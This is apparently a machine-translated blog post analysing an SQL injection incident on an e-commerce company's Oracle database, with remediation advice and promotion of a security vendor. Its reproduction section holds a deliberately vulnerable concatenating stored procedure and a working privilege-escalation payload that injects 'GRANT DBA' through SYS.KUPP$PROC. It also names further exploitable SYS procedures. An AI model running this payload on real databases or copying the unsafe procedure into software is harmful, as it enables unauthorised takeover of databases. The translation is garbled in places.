Stored procedure causes serious security backdoor--A case analysis of SQL injection security event of a certain e-commerce

March Women's Day, the e-commerce industry set up their own festivals, really let love shopping women crazy. Silently hiding behind the screen of the Black Hand, this time is also a busy time. Afterwards, I was fortunate to be invited to participate in a company hacker intrusion e-commerce ERP system security incident assessment analysis. Hackers take the means and the reason behind the analysis, hidden to customer information, share to everyone, warning against.

Event, the company found that the e-commerce ERP system backend Database (Oracle) was injected into SQL, particularly serious is the application of ordinary user account is promoted to DBA authority, fortunately, the intruder did not destroy the database background data, such as TRUNCATE table or drop database, otherwise the consequences will be unbearable. As a result, the company's internal security administrator on the account of the industry within the information processing, as a database security important vendor Anwarking Infiltration research engineer, the author is also invited to participate in the incident, the cause and preventive measures to summarize. Lens playback, see below:

Overview of the intrusion process

The clue is on the Web server Apache log that corresponds to the a company e-commerce system. Log recorded a large number of SQL injection behavior, the author analyzed to determine that the intrusion was initiated by the Web, through the e-commerce system vulnerability, hackers to obtain the current e-commerce system access to a database account Erp_user. The account itself has only the application system
Access to the system, but the hacker through the application of an injection vulnerability of the stored procedure to complete the right intrusion, the stored procedure contains a function of the parameter type varchar, through to the parameter passed "GRANT DBA to Erp_user", complete the account of the full right to work After checking the source code, it is found that inside the function, there is code that forms the SQL statement and executes it through the parameter concatenation.

The intrusion process reappears

In order to illustrate clearly, the author here for everyone to reproduce the hacker invasion process.

(1) First we simulate an unsafe stored procedure created by a developer:
CREATE OR REPLACE PROCEDURE vulnproc (STR VARCHAR)
Is STMT VARCHAR (2000);
BEGIN
Stmt:= ' SELECT * from all_objects WHERE object_name = ' ' | | STR | | ";
EXECUTE IMMEDIATE STMT;
END;
GRANT execute on Vulnproc to public-assigns the stored procedure execution permission to the public;

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M02/6C/62/wKiom1VIMPuxjB1wAACrclQzhmQ757.jpg "title=" 20150415-1.jpg "alt=" Wkiom1vimpuxjb1waacrclqzhmq757.jpg "/>

(2) Next we create a user account with the lowest level

Create a test account to simulate a hacker's access to an account. The account number is Schina (the database used for reproducing is 11.2.0.1.0 on XP)

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/6C/62/wKiom1VIMc_gWJZbAACfv3izd8Q811.jpg "style=" float: none; "title=" 20150415-2.jpg "alt=" Wkiom1vimc_gwjzbaacfv3izd8q811.jpg "/>

Sqlplus/as SYSDBA--Login database;
Create user Schina identified by Schina--creating test users;
Grant create session to Schina--only the session permission is given;
Connect Schina/schina-Log in to the test account;
SELECT * FROM Session_privs--Query the current user permissions;

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M01/6C/5E/wKioL1VIMz-zkIEzAABv4vAn7H0665.jpg "title=" 20150415-3.jpg "style=" Float:none; "alt=" wkiol1vimz-zkiezaabv4van7h0665.jpg "/>

(3) Simulating Hacker's right to mention

Log in with the Schina account, call the stored procedure Vulnproc Middle embed the right statement grant DBA to Schina.

Exec
SYS. Vulnproc (' Liusicheng ' | | SYS. Kupp$proc. Create_master_process
(' EXECUTE IMMEDIATE ' ' DECLARE PRAGMA autonomous_transaction;
BEGIN EXECUTE IMMEDIATE "" "GRANT DBA to Schina" "";
END; ""; ") | |" Schina ');

SET ROLE DBA--success;

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M01/6C/62/wKiom1VIMdCCQPelAADUsecKmmA974.jpg "title=" 20150415-4.jpg "style=" Float:none; "alt=" wkiom1vimdccqpelaaduseckmma974.jpg "/>

SELECT * FROM User_role_privs--Query the current user right discovery has DBA authority;

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M02/6C/5E/wKioL1VIM0HwuTjZAABgz4XJwls924.jpg "title=" 20150415-5.jpg "style=" Float:none; "alt=" wkiol1vim0hwutjzaabgz4xjwls924.jpg "/>

By the end of the invasion, the entire process has been fully reproduced.

Through this hacking process, we can conclude that the process of hacking is done through a series of means. First, through the vulnerability of the Web application to obtain a database low-privileged password, and then through a DBA established by the insecure stored procedures and a specific system function parameters to the low-privileged user rights. The ultimate hacker gets a DBA authority account.

Causes and protection recommendations

According to the whole process of simulation, we can see that the hacker invasion mainly originated from a company's e-commerce system in three directions of security risks:

1. Web Application System Self-security

2. Flaws in the security mechanisms of Oracle databases

3. Application developer's low-level PL/SQL code

(1) Web application security problems and suggestions for remediation

Security issues:

The writing of Web applications lacks the defense mechanism for SQL injection

Lack of professional security measures for Web firewalls or database firewalls

Solution Recommendations:

The application software security upgrade, change the non-standard writing method, as far as possible to use prepare way SQL statement execution;

Code specification check for adding input content

Regular vulnerability scanning of Web applications, vendor cooperation to quickly fix the vulnerabilities

Enhanced anti-SQL injection capabilities by adding web firewalls such as WAF

String database firewalls between Web apps and databases to further prevent SQL injections that WAF does not recognize

(2) Oracle data security mechanism defects

Defect 1

There are security implications for the permissions mechanism of the Oracle database's own stored procedures and function calls:

When a user calls the PL/SQL subroutine, the program accesses the underlying objects (including tables, etc.) that the user does not have permission to access, only the user has permission to execute the stored procedure, while executing is referencing the permissions of the subroutine's definition.

Simply put, if the creator only creates permissions and does not have execute permissions, then even the SYS account will still fail to execute. Because of the time of the subroutine executing the definition of the permission mode. The current account permissions in the subroutine are the same as the user rights to create the subroutine. While this gives Oracle a lot of flexibility, there are a lot of security implications. Just like the example above. Hackers can use subroutines to get the same high privileges as the child program creator, and then execute malicious code with high privileges. This means hackers can get DBA accounts and even control the entire Oracle.

Defect 2

The parameters of some system functions in Oracle lack control over input type and length, resulting in injection points being formed. The parameters for this function that are not controlled by Oracle need to be further constrained. Constraints can be used to wait for patches to be patched by Oracle, or to limit the scope of use of specific functions through the database firewall.

Defect 3

Oracle itself exists a system stored procedure or function itself has the right to exploit vulnerabilities, these systems stored procedures or functions require the caller's permission is very low, but by injecting the way to complete the caller's permissions to the DBA, such as:
SYS.LT.COMPRESSWORKSPACETREE, SYS. DBMS_CDC_IMPDP. Bump_sequence, SYS. Kupw$worker. MAIN, Ctxsys. Driload. Build_dml and so on.

Low-level errors for PL/SQL developers

1. Lack of restrictions on user input. For the database to prevent the right, the most important thing is to strictly control user input. The data in the dynamic variable can be restricted by the specific application when specifying user input by means of a dynamic variable. For example, restricting the use of special characters such as single quotes within a certain range, and not allowing specific strings such as DBAs, prohibit the use of connectors (| | such as

2. Strict restrictions on permissions, the DBA must be in time to recover some temporary permissions to users. Otherwise, it will be a fertile soil for multiple SQL injection methods. For example, if ALTER session permission is not retracted. The hacker can use ALTER session permission to modify the system default parameters to complete the lateral privilege elevation attack. In oracle10g, many hackers used Mdsys as a malicious user to attack a database. The root of a series of attacks that Mdsys can perform is that the user has the Create any trigger permission. Locate the user who has DBA authority in the database. Extracts a table in a table owned by the user that allows public users to perform DML operations. Mdsys create a trigger with malicious code. Executing a trigger with the caller's permission will enable the procedure to execute with DBA authority. Executing malicious code

Summary

There are many problems with databases and Web applications themselves, and the best way to do this is to get vendor-released fixes in a timely manner.
However, due to a number of reasons, such as release time or service purchase, which can cause a loophole in the vacuum period, this vacuum period will require temporary protection through the corresponding firewall. But in fact, the actual hacking cases are often inseparable from the mistakes of the developer or DBA.

In order to effectively prevent these problems, it is recommended that end users take the following actions:

(1) The use of vulnerability scanning Tool to find in the Web application, database, PL/SQL problems exist; There are few users currently checking the code in PL/SQL so that malicious developers or developers with poor security awareness often leave an injection of vulnerability or backdoor , such as Anwarking, a vendor-supplied database leak-scanning Tool has the ability to scan high-risk PL/SQL programs.
(2) Using database firewall or Web firewall to check and intercept the attack behavior of external hacker; Anwarking's database firewall effectively intercepts SQL injections from applications, even those that are complex enough to circumvent the WAF.

This article is from the Database security blog, so be sure to keep this source http://schina.blog.51cto.com/9734953/1641975

Stored procedure causes serious security backdoor--A case analysis of SQL injection security event of a certain e-commerce